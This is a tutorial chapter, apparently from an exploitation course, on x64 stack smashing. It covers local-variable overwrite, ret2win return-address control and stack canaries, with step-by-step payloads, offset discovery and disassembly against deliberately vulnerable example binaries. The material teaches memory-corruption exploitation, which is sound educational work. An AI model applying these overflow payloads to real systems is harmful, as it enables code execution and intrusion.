# Stack Smashing
Stack smashing is the loose grouping of exploits that can be reliably
constructed from stack variable overflows or OOBs, which have the effect of
"smashing" the legitimate contents of stack frames. While in the past the term
"Stack Smashing" may have referred to only local frame variable overwrites, more
modern use has become more general.

From an example perspective we will explore x64, which has the effect of using
the full stack frame (unlike some RISC type architectures). This also means all of our non-string types will be little endian, so if we want to write `0xaabbccdd` to the stack via an overflow, we will want to encode our exploit with the bytes `0xddccbbaa` which correspond to the little-endian representation.

<!-- 
Articles/Presentations:
 - https://docs.google.com/presentation/d/1_Zs7s7O_VqXd8prv0GIjUT993qL3KgjVby8qC0Ixs_w/edit#slide=id.p
 - https://insecure.org/stf/smashstack.html
 - https://wiki.bi0s.in/pwning/stack-overflow/smash-the-stack/

Videos:
 - https://www.youtube.com/watch?v=PVx1hUlMxtQ&ab_channel=pwn.college
-->

## Local Variable Smashing
As touched on before, a function will store its local variables on the current
stack frame. When we have a memory corruption primitive that we can use on a
stack variable, other stack variables become easy targets depending on their
relative position to the vulnerable variable and the primitive.

Below we have the example [Stack Smash](examples/stack-smash/).
```c
{{#include examples/stack-smash/stack-smash.c}}
```

We have a local buffer `buf`, which is 32 bytes, and we are reading up to 100
bytes from stdin into `buf`. Obviously this read is significantly larger than
the buffer so we will be able to overflow it. Additionally, later in the binary
we have a check on the value of the int `i` to see if it has the value
`0xf00dbabe`. This seems like an impossible check to pass for a 'correct'
program, however because of the position of the variables in this stack frame we are able to overflow into `i` and pass this check.

We can test out this potential to overflow by feeding a large amount of `A`'s
into the program as input.
```
$ python2.7 -c "print('a'*50)" | ./stack-smash
failed: 61616161
```

Even though we have the `failed` result, we can see that the value of `i` has
been populated with four 'a' characters. All we need to do now is to find the
offset from the start of `buf` to the start of `i` then we can control the value
of `i` precisely. Luckily pwntools has the `cyclic` tool, which is meant for
exactly this.

```
$ pwn cyclic 50 | ./stack-smash
failed: 6161616c
$ pwn cyclic -l 0x6161616c
44
```

Now that we know the offset is `44` bytes, we can craft a final payload, remembering to convert our target value to a little endian representation:
```
$ python2.7 -c "print('a'*44 + '\xbe\xba\x0d\xf0')" | ./stack-smash
win
```

<!-- TODO: ## Uninitialized Variable Control -->

## Return Address Control
Building off our previous example, the next most obvious target in the stack
frame is the return address pointer. If we can control our return address
pointer, then when the current function returns we will control execution of the
program.

Below, we have a very simple example [ret2win](examples/ret2win)
```c
{{#include examples/ret2win/ret2win.c}}
```

In this example, we have an identical primitive. However, this time instead of
needing to alter a local variable to win, we need to control the return address.
Conceptually this is actually no different, as we can think of the return
address as a stack variable containing a pointer value. If we know where we want
to go, we can change the pointer value and execute our target function as if we
had called it.

For this time around, we'll use the disassembly of the `vuln` function to
determine the offset to the return address. Remember that for the x64 stack
frame, the return address is at `rbp+0x8`.

```
$ objdump -d ret2win -M intel | grep 'vuln>:' -A 12
0000000000401092 <vuln>:
  401092:       f3 0f 1e fa             endbr64 
  401096:       55                      push   rbp
  401097:       48 89 e5                mov    rbp,rsp
  40109a:       48 83 ec 20             sub    rsp,0x20
  40109e:       48 8d 45 e0             lea    rax,[rbp-0x20]; offset of buf
  4010a2:       ba 64 00 00 00          mov    edx,0x64
  4010a7:       48 89 c6                mov    rsi,rax
  4010aa:       bf 00 00 00 00          mov    edi,0x0
  4010af:       e8 9c ff ff ff          call   401050 <read@plt>
  4010b4:       90                      nop
  4010b5:       c9                      leave  
  4010b6:       c3                      ret  
```

As we can see above, the offset into the stack frame for `buf` is `rbp-0x20`.
This makes sense as `buf` is the only variable on our function stack and is 0x20
bytes. The difference between `-0x20` and `+0x8` is `0x28` (`40`) bytes. As this binary is also not PIE/PIC compiled, every time it runs the function addresses will be in the same location, so we need to find the address of `win` as well.

```
$ objdump -d ret2win -M intel | grep 'win>:'
0000000000401070 <win>:
```

We can use this address and the offset to craft our final payload:
```
$ python2.7 -c "print('a'*40 + '\x70\x10\x40\x00\x00\x00\x00\x00')" | ./ret2win
win
```


## Stack Canaries and OOB Techniques
To mitigate against these types of overflows, which are still quite common in
native applications, most compilers will inject a magic variable into each
function that is checked at the end of the function before the return. If the
value is altered, the program self-terminates in order to prevent further
exploitation.

Below is the Ghidra C decompilation of the ret2win binary's vuln function when `
-fno-stack-protector` is not given to the compiler, enabling stack canaries.
```c
void vuln(void) {
  long stack_canary;
  char buf [32];
  
  stack_canary = *(in_FS_OFFSET + 0x28);
  read(0,buf,100);
  if (stack_canary != *(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail(); /* WARNING: Subroutine does not return */
  }
  return;
}
```

We can see that this is nearly identical to the original function, although the
"top" of the local function variables is now protected by a value that is set
from a process level global value that is also checked on exit. If the value is
altered on the local stack before the program returns, the program crashes
itself for safety.

There are a few considerations for this style of protection. First, this adds a
non-zero amount of computation and file size to the function. For extremely
constrained devices, such as safety-critical systems or low-memory embedded
devices, stack canaries may not be desirable. However without rigorous testing,
these devices will then remain highly vulnerable to stack based attacks.

Second, stack cookies are only protecting against overflows that do not keep the
original value of the cookie, which typically does not change per process. An
overflow that reads the stack on another function could be used to include the
correct value of the cookie in our overflow write, or an OOB write used to
directly access the return value will still allow our previous techniques to
function as expected.

<!-- TODO: cookie leak or OOB ret2win example -->
